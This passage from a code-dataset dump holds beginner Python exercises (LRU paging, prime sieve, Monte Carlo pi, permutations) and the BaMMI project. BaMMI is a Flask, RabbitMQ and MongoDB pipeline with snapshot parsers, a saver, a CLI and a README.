page to the end of the list\n                pos = temp.index(page)\n                temp = temp[:pos] + temp[pos + 1:] + [page]\n            else:  # the requested page is not in a memory block; evict the earliest accessed page and load the new one\n                temp.pop(0)\n                temp.append(page)\n                times += 1\n    return times\nn = 
int(input())\nlst = tuple(input().split(\" \"))\nprint(LRU(lst, 3, n))" }, { "alpha_fraction": 0.5032397508621216, "alphanum_fraction": 0.53995680809021, "avg_line_length": 21.090909957885742, "blob_id": "87ba25ce17be4ca8fb2ec1f26aaac6a770ac5328", "content_id": "6131483df8a8b13c18482d33113d583c8b6e4eca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 475, "license_type": "no_license", "max_line_length": 37, "num_lines": 22, "path": "/Python_tutorial1/Python0004.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0004】verify the 6174 conjecture\ndef Min_Number(a):\n    a = str(a)\n    arr = []\n    for i in range(0,4):\n        arr.append(a[i])\n    arr.sort()\n    return int(''.join(arr))\ndef Max_Number(a):\n    a = str(a)\n    arr = []\n    for i in range(0, 4):\n        arr.append(a[i])\n    arr.sort(reverse=True)\n    return int(''.join(arr))\na = input()\nprint(a,end=' ')\nwhile (int(a) != 6174):\n    a = Max_Number(a) - Min_Number(a)\n    print(a , end=\" \")" }, { "alpha_fraction": 0.4921875, "alphanum_fraction": 0.5234375, "avg_line_length": 22.10344886779785, "blob_id": "759ce8f748e871e788b27204dc118f49aad96571", "content_id": "983b65d6405c6125bbb9cf12ede0e8ce5bedf53d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 67, "num_lines": 29, "path": "/Python_tutorial1/Python0008.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "# coding=utf-8\n# author = zhoulonghai\n# 【Python0008】sieve method for finding primes\n\nimport numpy\nimport math\nnum = [int(n) for n in input('').split()]\nMAX_INT = num[1]\nMIN_INT = num[0]\nmarks_bool = [True] * (MAX_INT + 1)\nfor i in range(2,int(math.sqrt(MAX_INT)) + 1):\n    j = i\n    k = j\n    while j * k <= MAX_INT:\n        marks_bool[j * k] = False\n        k += 1\nsum_int = 0\nl = []\nfor i in range(2,MAX_INT + 1):\n    if marks_bool[i] is True:\n        if(i >= MIN_INT):\n            l.append(i)\nkm = [num for elem in numpy.array(l).reshape(-1,5) for num in elem]\np = 1\nfor num in km:\n    print(num , \" \", end =\"\")\n    if p % 5 == 0 :\n        print(\"\")\n    p = p + 1" }, { "alpha_fraction": 0.5691699385643005, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 19.538461685180664, "blob_id": "06bbc16404fe1f2c91130ff89fa19bcfd826e0a6", "content_id": "4a6753cff5d74f0650efe46340e9bd481392e61b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/Python_tutorial1/Python0003.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0003】compute pi with the Monte Carlo method\nimport random\n#use the random library\nnum=int(input())\nok=0\nfor i in range(1,num+1):\n    x = random.uniform(-1,1)#random number between -1 and 1\n    y = random.uniform(-1,1)\n    if(x*x+y*y<=1):\n        ok+=1\nprint(ok/num*4)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5510948896408081, "avg_line_length": 18.64285659790039, "blob_id": "bf4e07d238c9a1d8817b033ac4703cd4bfbfb38a", "content_id": "9518a71191a169a4d6defe3b611e2fcd13720e4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/Python_tutorial1/Python0006.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0006】climbing stairs\ndef climb(num):\n    if num == 1:\n        return 1\n    if 
num == 2:\n        return 2\n    if num == 3:\n        return 4\n    else:\n        sum = climb(num-1)+climb(num-2)+climb(num-3)\n        return sum\nprint(climb(int(input())))" }, { "alpha_fraction": 0.6927480697631836, "alphanum_fraction": 0.7041984796524048, "avg_line_length": 25.25, "blob_id": "f38703d519efcb3cc8981c3197f0fd5856de9f91", "content_id": "eb28763e1340f61ccb2d5205e4f4ab0fe7ed8a09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 62, "num_lines": 20, "path": "/Python_tutorial1/Python0002.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0002】permutation and combination sequences\nimport itertools #Python's built-in itertools module provides very useful functions for operating on iterable objects.\nnum = input().split( ) #read n and m\nm = int(num[1])\narr = input().split( ) #read n letters\n#both permutations and combinations return an iterator\ncom = list(itertools.combinations(arr,m)) #the combinations method focuses on combinations (order ignored)\nper = list(itertools.permutations(arr,m)) #the permutations method focuses on arrangements (order matters)\nprint(\"Permutation:\" )\nfor i in per:\n    for j in i:\n        print(j , end=\" \")\n    print()\nprint(\"Combination:\" )\nfor i in com:\n    for j in i:\n        print(j , end=\" \")\n    print()" }, { "alpha_fraction": 0.4846266508102417, "alphanum_fraction": 0.516837477684021, "avg_line_length": 19.117647171020508, "blob_id": "f3a0c95450968fb4d81e58bcd31cfb3d4f3bd6a2", "content_id": "9aedeb0aac3693b45cc51b5eb6860b76f35231bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 695, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/Python_tutorial1/Python0009.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0009】find the saddle point\n\nlist1=[]\nlist_max=[]\nlist_min=[]\nfor i in range(5):\n    list=input().split()\n    list_int=[int(x) for x in list]\n    list1.append(list_int )\n    k=0\n    for j in list_int:\n        if j==max(list_int):\n            break\n        k=k+1\n    list_max.append([i+1,k+1, max(list_int)])\n#print(list_max)\nlist2=[[list1[j][i] for j in range(5)] for i in range(5)]\ni=0\nfor l in list2:\n    i=i+1\n    k = 0\n    for j in l :\n        if j == min(l):\n            break\n        k = k + 1\n    list_min.append([ k + 1,i, min(l)])\n#print(list_min)\n\nfor i in list_max:\n    for j in list_min:\n        if str(i)==str(j):\n            print(i,end=\" \")" } ]
10
roypel/BaMMI
https://github.com/roypel/BaMMI
f65a5c7bd57e185a9a828091c8b7c6a537aa5db9
64528738bfe4a9a48dcf1417e63e9116f24953a4
302e9764a9f419bc558200846e2e7a289d200654
refs/heads/master
2022-09-21T00:23:00.648010
2022-08-25T17:37:18
2022-08-25T17:37:18
230,133,137
0
0
null
2019-12-25T17:20:49
2022-01-17T20:40:20
2022-08-25T17:37:18
Python
[ { "alpha_fraction": 0.662715494632721, "alphanum_fraction": 0.662715494632721, "avg_line_length": 39.34782791137695, "blob_id": "3925ec9e566d2774b8b00871d1477f9c96a3de69", "content_id": "33bdfd1669a0519020d52f4194acc91356116314", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 107, "num_lines": 23, "path": "/BaMMI/saver/Saver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from ..utils.DBWrapper import DBWrapper\nfrom ..utils.PubSuber import PubSuber\nfrom ..utils.UtilFunctions import extract_json_from_raw_data\n\n\nclass Saver:\n\n def __init__(self, db_url):\n self.db_con = DBWrapper(db_url)\n self.known_fields = ['pose', 'feelings', 'color_image', 'depth_image']\n\n def save(self, topic_name, data):\n if topic_name in self.known_fields:\n user_data, snapshot_data = extract_json_from_raw_data(data)\n self.db_con.insert_snapshot_data_by_user(user_data, snapshot_data, topic_name)\n else:\n raise ValueError(f\"Unknown field {topic_name}\")\n\n def consume_topics(self, mq_url):\n pubsuber = PubSuber(mq_url)\n pubsuber.init_exchange('parsers_results', exchange_type='topic')\n pubsuber.bind_queue(binding_keys='#')\n pubsuber.consume_messages(lambda ch, method, properties, body: self.save(method.routing_key, body))\n" }, { "alpha_fraction": 0.7074379920959473, "alphanum_fraction": 0.7074379920959473, "avg_line_length": 39.33333206176758, "blob_id": "5d3dd12c7678ff1185f0479d8fe2557967ccc53c", "content_id": "193cc04c6220f0cc85605954bea87e029296400a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 112, "num_lines": 15, "path": "/BaMMI/parsers/all_parsers/DepthImage.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef parse_depth_image(context, snapshot):\n if 'depth_image' not in snapshot:\n raise KeyError(\"Snapshot is missing the Depth Image data\")\n save_path = context.generate_path('depth_image.jpg')\n depth_image = np.fromfile(snapshot['depth_image']['data'], dtype=float)\n depth_image = np.reshape(depth_image, (snapshot['depth_image']['height'], snapshot['depth_image']['width']))\n plt.imsave(save_path, depth_image, cmap='hot')\n return context.format_returned_data('depth_image', save_path)\n\n\nparse_depth_image.field = 'depth_image'\n" }, { "alpha_fraction": 0.6322008967399597, "alphanum_fraction": 0.6469719409942627, "avg_line_length": 26.079999923706055, "blob_id": "3782acdccd7967c68e6c67620fcf4a037be4e37f", "content_id": "675ebe85bb4de8ffe526a78f2870590305e3aeb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 96, "num_lines": 25, "path": "/BaMMI/utils/APIServer.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from flask import Flask\n\n\nclass EndpointAction:\n def __init__(self, action):\n self.action = action\n\n def __call__(self, *args, **kwargs):\n return self.action(*args, **kwargs)\n\n\nclass FlaskWrapper:\n app = None\n\n def __init__(self, name=__name__):\n self.app = Flask(name)\n\n def run(self, host='127.0.0.1', port=8000):\n self.app.run(host=host, port=port)\n\n def add_endpoint(self, endpoint=None, endpoint_name=None, handler=None, methods=None):\n self.app.add_url_rule(endpoint, endpoint_name, EndpointAction(handler), 
methods=methods)\n\n def register_blueprint(self, blueprint):\n self.app.register_blueprint(blueprint)\n" }, { "alpha_fraction": 0.6754658222198486, "alphanum_fraction": 0.6754658222198486, "avg_line_length": 34.77777862548828, "blob_id": "fc28b3ac07c652a8e38d0a9efd0294100ce0b050", "content_id": "42692cee4a6506c72c1be9fdcd99033f6cd92714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 78, "num_lines": 18, "path": "/BaMMI/parsers/all_parsers/ColorImage.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from PIL import Image as PILIm\n\n\ndef parse_color_image(context, snapshot):\n if 'color_image' not in snapshot:\n raise KeyError(\"Snapshot is missing the Color Image data\")\n save_path = context.generate_path('color_image.jpg')\n size = snapshot['color_image']['width'], snapshot['color_image']['height']\n image_data_path = snapshot['color_image']['data']\n with open(image_data_path, 'rb') as f:\n image_data = f.read()\n image = PILIm.new('RGB', size)\n image.frombytes(image_data)\n image.save(save_path)\n return context.format_returned_data('color_image', save_path)\n\n\nparse_color_image.field = 'color_image'\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 37, "blob_id": "f695d37b6988d8693861f364a325b27cf8d8dd4d", "content_id": "65b7dfea6bf3c696cdc64072b21d367f01ea30e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 37, "num_lines": 1, "path": "/BaMMI/parsers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .ParserHandler import run_parser\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6272727251052856, "avg_line_length": 10.100000381469727, "blob_id": "710c42a37fa4ff7278259b60a63717083daf5603", "content_id": "0c565c890d9e474d20e2119f1f572fd6e84c9726", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 110, "license_type": "no_license", "max_line_length": 25, "num_lines": 10, "path": "/scripts/run-pipeline.sh", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsudo docker-compose up -d\ncd ./tests\npytest\nwhile [ $? -ne 0 ]; do\n sleep 30\n pytest\ndone\ncd .." 
}, { "alpha_fraction": 0.6884120106697083, "alphanum_fraction": 0.6884120106697083, "avg_line_length": 29.657894134521484, "blob_id": "7c98e3d4573c3dcca988d136fe49900b948aafc7", "content_id": "c0c9efeb1c27f662765be8db190789a64d6ad300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 102, "num_lines": 38, "path": "/BaMMI/utils/UtilFunctions.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import json\nimport os\nfrom urllib.parse import urlparse\n\n\ndef ensure_dir(dir_path):\n    full_path = os.path.expanduser(dir_path)\n    if not os.path.isdir(full_path):\n        os.makedirs(os.path.dirname(full_path), exist_ok=True)\n\n\ndef save_data_to_file(data, file_path, data_type=''):\n    ensure_dir(file_path)\n    with open(file_path, f'w{data_type}') as f:\n        f.write(data)\n\n\ndef get_true_relative_path(file_path, relative_path):\n    return os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(file_path)), relative_path))\n\n\ndef build_path_for_files_from_data(base_path, user_id, snapshot_timestamp, filename):\n    return os.path.normpath(os.path.join(base_path, user_id, snapshot_timestamp, filename))\n\n\ndef find_driver(drivers, url):\n    url_scheme = urlparse(url).scheme\n    for scheme, cls in drivers.items():\n        if url_scheme.lower() == scheme.lower():\n            return cls(url)\n    raise ValueError(\"Unknown type of URL was given\")\n\n\ndef extract_json_from_raw_data(raw_data):\n    json_data = json.loads(raw_data)\n    user_data = json_data['user_data']\n    snapshot_data = json_data['snapshot_data']\n    return user_data, snapshot_data\n" }, { "alpha_fraction": 0.6074918508529663, "alphanum_fraction": 0.6416938304901123, "avg_line_length": 28.238094329833984, "blob_id": "850906a9502c95d4d7862050d3882eb5ad641710", "content_id": "764a32c824a3f76174255857e59b90f6b50b2063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 614, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/BaMMI/api/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .API import run_api_server\nfrom ..utils.CLITemplate import log, main\nfrom ..utils.Constants import mongodb_url\n\n\n@main.command('run-server')\n@click.option('-h', '--host', default='127.0.0.1', type=str)\n@click.option('-p', '--port', default=5000, type=int)\n@click.option('-d', '--database', default=mongodb_url, type=str)\ndef run(host='127.0.0.1', port=5000, database=mongodb_url):\n    log(run_api_server(host, port, database))\n\n\nif __name__ == '__main__':\n    try:\n        main(prog_name='api', obj={})\n    except Exception as error:\n        log(f'ERROR: {error}')\n        sys.exit(1)\n" }, { "alpha_fraction": 0.6424010396003723, "alphanum_fraction": 0.6692209243774414, "avg_line_length": 33.043479919433594, "blob_id": "663757ddae26519588ab446252bb66bd44c54945", "content_id": "01a2fc49df33b8a615a70c9bba53e88b36e4b076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 783, "license_type": "no_license", "max_line_length": 95, "num_lines": 23, "path": "/BaMMI/server/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .Receiver import publish_to_message_queue\nfrom .Server import run_server\nfrom ..utils.CLITemplate import log, main\nfrom ..utils.Constants import rabbit_mq_url\n\n\n@main.command('run-server')\n@click.argument
('url', default=rabbit_mq_url, type=str)\n@click.option('-h', '--host', default='127.0.0.1', type=str)\n@click.option('-p', '--port', default=8000, type=int)\ndef run(url, host='127.0.0.1', port=8000):\n    log(run_server(host, port, lambda user_data, snapshot, binary_type_data, array_type_data:\n        publish_to_message_queue(user_data, snapshot, binary_type_data, array_type_data, url)))\n\n\nif __name__ == '__main__':\n    try:\n        main(prog_name='server', obj={})\n    except Exception as error:\n        log(f'ERROR: {error}')\n        sys.exit(1)\n" }, { "alpha_fraction": 0.7159090638160706, "alphanum_fraction": 0.7159090638160706, "avg_line_length": 13.666666984558105, "blob_id": "0250a038911b974af44eacbf625fddc480292bc0", "content_id": "94b02a7a2efac72b9a14c910a397f31cad2fa0a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/BaMMI/utils/drivers/mq_drivers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .RabbitDriver import RabbitDriver\n\n\nmq_drivers = {\n    'rabbitmq': RabbitDriver,\n}\n" }, { "alpha_fraction": 0.6811279654502869, "alphanum_fraction": 0.6811279654502869, "avg_line_length": 37.25, "blob_id": "a8b041e6eb26e5b215641a2ec662c7b9c4260873", "content_id": "1d02c2e1341aa4a3f8c31f8e920c86d35eb3d585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 66, "num_lines": 12, "path": "/BaMMI/parsers/all_parsers/Pose.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\n\ndef parse_pose(context, snapshot):\n    if 'pose' not in snapshot:\n        raise KeyError(\"Snapshot is missing the Pose data\")\n    pose_data = snapshot['pose']\n    if 'translation' not in pose_data:\n        raise KeyError(\"Snapshot is missing the Translation data\")\n    if 'rotation' not in pose_data:\n        raise KeyError(\"Snapshot is missing the Rotation data\")\n    return context.format_returned_data('pose', snapshot['pose'])\n\n\nparse_pose.field = 'pose'\n" }, { "alpha_fraction": 0.6147426962852478, "alphanum_fraction": 0.6147426962852478, "avg_line_length": 36.842105865478516, "blob_id": "0bf8dc241c154645dd1642c2a9f2c4ec7e273078", "content_id": "035c37aad7333a27aedf8ed31a09c9bcba0e9181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 102, "num_lines": 19, "path": "/BaMMI/parsers/Context.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import os\nfrom ..utils import UtilFunctions\n\n\nclass Context:\n\n    def __init__(self, base_path, user_data, snapshot_data):\n        self.base_path = base_path\n        self.user_id = user_data['user_id']\n        self.snapshot_timestamp = snapshot_data['datetime']\n\n    def generate_path(self, file_name):\n        of_the_jedi = UtilFunctions.build_path_for_files_from_data(self.base_path, self.user_id,\n                                                                   self.snapshot_timestamp, file_name)\n        UtilFunctions.ensure_dir(os.path.dirname(of_the_jedi))\n        return of_the_jedi\n\n    def format_returned_data(self, field_name, data):\n        return {'datetime': self.snapshot_timestamp, field_name: data}\n" }, { "alpha_fraction": 0.5779660940170288, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 20.851852416992188, "blob_id": "2f0e8a71608e737803d63295c8687656fd39b4b0", "content_id": "c2b3f63dc5b2437d4a78408f674adfb8f042bf46", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 82, "num_lines": 27, "path": "/tests/test_listener.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "# TODO: Update tests! They're old and not relevant\n\n\n# import socket\n# import time\n#\n# import pytest\n#\n#\n# _PORT = 1234\n# _HOST = '127.0.0.1'\n# _BACKLOG = 5000\n# _REUSEADDR = True\n#\n#\n# @pytest.fixture\n# def listener():\n#     pass\n#     # return Listener(_PORT, host=_HOST, backlog=_BACKLOG, reuseaddr=_REUSEADDR)\n#\n#\n# def test_context_manager(listener):\n#     assert socket.socket().connect_ex((_HOST, _PORT)) != 0\n#     with listener:\n#         time.sleep(0.1)\n#         assert socket.socket().connect_ex((_HOST, _PORT)) == 0\n#     assert socket.socket().connect_ex((_HOST, _PORT)) != 0\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 20.10344886779785, "blob_id": "9094a638099c5aca2189a105d92d5f32a3f7db2a", "content_id": "7400bffbdab340c275eb0eff2cf81bffe20c401f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/BaMMI/utils/CLITemplate.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport traceback\nimport click\n\n\nclass Log:\n\n    def __init__(self):\n        self.quiet = False\n        self.traceback = False\n\n    def __call__(self, message):\n        if self.quiet:\n            return\n        if self.traceback and sys.exc_info():  # there's an active exception\n            message += os.linesep + traceback.format_exc().strip()\n        click.echo(message)\n\n\nlog = Log()\n\n\n@click.group()\n@click.option('-q', '--quiet', is_flag=True)\n@click.option('-t', '--traceback', is_flag=True)\ndef main(quiet=False, traceback=False):\n    log.quiet = quiet\n    log.traceback = traceback\n" }, { "alpha_fraction": 0.6568074822425842, "alphanum_fraction": 0.6568074822425842, "avg_line_length": 40.764705657958984, "blob_id": "0ae42d5a85daaeb70460b54a91f9807704e89d79", "content_id": "77ab1076ab4fd9d41ff505fc7bd132c8c1612a5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2130, "license_type": "no_license", "max_line_length": 116, "num_lines": 51, "path": "/BaMMI/utils/drivers/mq_drivers/RabbitDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from urllib.parse import urlparse\nimport pika\n\n\navailable_exchanges = ['direct', 'topic', 'fanout', 'headers']\n\n\nclass RabbitDriver:\n\n    def __init__(self, url):\n        parsed_url = urlparse(url)\n        self.connection = pika.BlockingConnection(\n            pika.ConnectionParameters(host=parsed_url.hostname, port=parsed_url.port))\n        self.channel = self.connection.channel()\n        self.exchange_name = ''\n        self.queue_name = ''\n\n    def init_exchange(self, exchange_name, exchange_type):\n        if exchange_type not in available_exchanges:\n            raise ValueError(f\"Unknown exchange type for RabbitMQ. 
Choose one of {available_exchanges}\")\n        self.channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)\n        self.exchange_name = exchange_name\n\n    def init_queue(self, queue_name, *args, **kwargs):\n        result = self.channel.queue_declare(queue=queue_name, *args, **kwargs)\n        if not queue_name:\n            self.queue_name = result.method.queue\n\n    def publish_message(self, message, routing_key='', *args, **kwargs):\n        self.channel.basic_publish(\n            exchange=self.exchange_name, routing_key=routing_key, body=message, *args, **kwargs)\n\n    def consume_messages(self, callback, *args, **kwargs):\n        if not self.queue_name:\n            self.init_queue('')\n        self.channel.basic_consume(queue=self.queue_name, on_message_callback=callback, *args, **kwargs)\n        self.channel.start_consuming()\n\n    def bind_queue(self, binding_keys=None):\n        if not self.queue_name:\n            self.init_queue('')\n        if isinstance(binding_keys, list):\n            for binding_key in binding_keys:\n                self.channel.queue_bind(exchange=self.exchange_name, queue=self.queue_name, routing_key=binding_key)\n        elif isinstance(binding_keys, str):\n            self.channel.queue_bind(exchange=self.exchange_name, queue=self.queue_name, routing_key=binding_keys)\n        else:\n            raise TypeError(\"Binding keys format isn't recognized, pass a string or a list of strings\")\n\n    def close(self):\n        self.connection.close()\n" }, { "alpha_fraction": 0.7348873615264893, "alphanum_fraction": 0.7434343695640564, "avg_line_length": 53.08403396606445, "blob_id": "15dfcd9350d60c32878721552d0eef9eae6b169", "content_id": "3d124903c5ba5760750e83af8f6cad8903a83ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6437, "license_type": "no_license", "max_line_length": 163, "num_lines": 119, "path": "/README.md", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "![BaMMI_Not_Bambi](https://vignette.wikia.nocookie.net/disney/images/c/ce/Profile_-_Bambi.png/revision/latest/scale-to-width-down/1031?cb=20190313173158)\n[![Build Status](https://travis-ci.com/roypel/BaMMI.svg?branch=master)](https://travis-ci.com/roypel/BaMMI)\n![coverage](https://codecov.io/gh/roypel/BaMMI/branch/master/graph/badge.svg)\n\n*This project isn't related to Bambi™ in any way, except they share 80% of the letters in their name* \n\n# BaMMI\nBaMMI is a Basic Mind-Machine Interface, designed to let you save, manage and communicate your thoughts to a machine!\nHow cool is that?!\n\n\n## Installation\n\n1. Clone the repository and enter it:\n\n    ```sh\n    $ git clone git@github.com:roypel/BaMMI.git\n    ...\n    $ cd BaMMI/\n    ```\n\n2. Run the installation script and activate the virtual environment:\n\n    ```sh\n    $ ./scripts/install.sh\n    ...\n    $ source .env/bin/activate\n    [BaMMI] $ # Let's roll\n    ```\n \n \n## Usage\n\n`BaMMI` provides access to five different components via API and command-line interface.\nThe five components are a client, a server, a parser handler, a saver,\n and an API to communicate with a DB that keeps the data.\n\nWhile the components can work independently, and might also integrate\n with different services that aren't provided in this package, there's a provided `run-pipeline.sh` script\n that will orchestrate all the needed backend services so you can just use the client \n (simply use `python -m BaMMI.client upload-sample /path/to/snapshot/data` after installation finishes) to upload some data and \n see how it all works. 
To know everything is up, pytest tests are launched until they pass; this might take a minute or two\n until all the services are up.\n\nNote that all the CLI commands accept the `-q` or `--quiet` flag to suppress output, and the `-t`\nor `--traceback` flag to show the full traceback when an exception is raised\n(by default, only the error message is printed, and the program exits with a\nnon-zero code).\n\n### Client\n\nThe client is available as `BaMMI.client` with the `upload_sample` API that, given a `host`, `port`, and a `path` to \na local snapshot file, will upload the given file in `path` to _`host:port`_.\n\nThere's also an option to upload a file through the CLI, via `python -m BaMMI.client upload-sample`, which has\nthe options to receive a host (_`-h`_ or _`--host`_) and a port (_`-p`_ or _`--port`_), and a path to the snapshot file.\n\nThe default values both in the API and CLI are `host='127.0.0.1'`, `port=8000`.\n\nNote that the expected file format is a gzipped binary file that has a sequence of message sizes (uint32) and messages\nof the corresponding sizes, assuming the first message is a User message and the rest are this user's snapshots.\n\nThe messages are expected to contain messages as defined in [this .proto file](https://storage.googleapis.com/advanced-system-design/cortex.proto).\nAlso, a sample file [is available here](https://storage.googleapis.com/advanced-system-design/sample.mind.gz).\nPlease refrain from downloading it without any certain need.\n\n\n### Server\n\nThe server is available as `BaMMI.server`, with the `run_server` API, and the `run-server` command in the CLI (`python -m BaMMI.server run-server`).\nBoth get a `host` and `port` as in the client, with the same defaults and options, but unlike the client the server also gets a publish destination.\n\nWhat does that mean? Well, in the API there's an option to pass a `publish` function; any snapshot data that the server receives\nwill be sent to that function and handled there. On the CLI, passing a function isn't possible, however there's an option to pass \nan MQ URL (RabbitMQ is preferred currently) that the server will publish the data to, so others may consume and process it.\n\nThe expected URL format is `service-name://user:password@host:port/`, e.g. `rabbitmq://127.0.0.1:5672/`.\n\nIn case you use the CLI or the default publish function, know that the data will be published to the MQ as JSON,\ncontaining `user_data` and `snapshot_data` keys that point to the data as sent to the server, except for binary data,\nwhich is saved to storage with a path given instead of the data itself.\n\n### Parsers\n\nThe parsers are simple functions that process data from the provided MQ, and post their results. If you wish, you can\nadd your own parsers, which will be explained at the end of this section.\n\nAs an API, you can access it in `BaMMI.parsers` using the `run_parser` method, which, given a parser name and raw data\nas published to the MQ, will return the processed result.\n\nAs a CLI, the commands `parse` and `run-parser` are available through `python -m BaMMI.parsers`. 
While `parse` gets a parser name\nand a path to raw data as given from the MQ, processes it and returns the results as if they were sent to the MQ\n(basically running the parser only once), using `run-parser` with a parser name and an MQ URL (take a look at the server section\nfor details) will attach the parser to the MQ, consuming raw data, processing it and publishing its results to a dedicated topic in the MQ.\n\nThere are 4 parsers provided, processing the user *feelings*, *pose*, *color_image* and *depth_image*.\nBut what if you want to process a new type of data?\n \n Well that's easy!\n \n All you need to do is add a file to _`BaMMI/BaMMI/parsers/all_parsers`_, making sure there's a function named *`parse_*`*\n and that it has a `field` attribute with the name of the field it processes from the snapshot data.\n \n ### Saver\n \n The saver is available as `BaMMI.saver`, exposing the `Saver` class, which receives a DB URL on its instantiation and\n supports the `save` function that, given a topic name from the MQ and data in the format published to that topic,\n saves the data to the DB.\n \n As with the parsers, the CLI has 2 modes - running `python -m BaMMI.saver` with the `save` command, which, given \n a DB URL (optional with the `-d` or `--database` flags, defaults to `mongodb://BaMMI:1337@mongo:27017`, and follows the URL\n format in the server section), a topic name and a path to data as published to the MQ, will attempt to save it\n to the DB, working only once, or using the `run-saver` command, which receives an MQ URL and a DB URL\n and consumes anything it can from the MQ, saving it to the DB.\n \n \n ## Future Plans\n \n API (rashly implemented, not yet tested :[ ) and CLI to see the data in the DB, as well as a GUI for easy navigation of all the users' data."
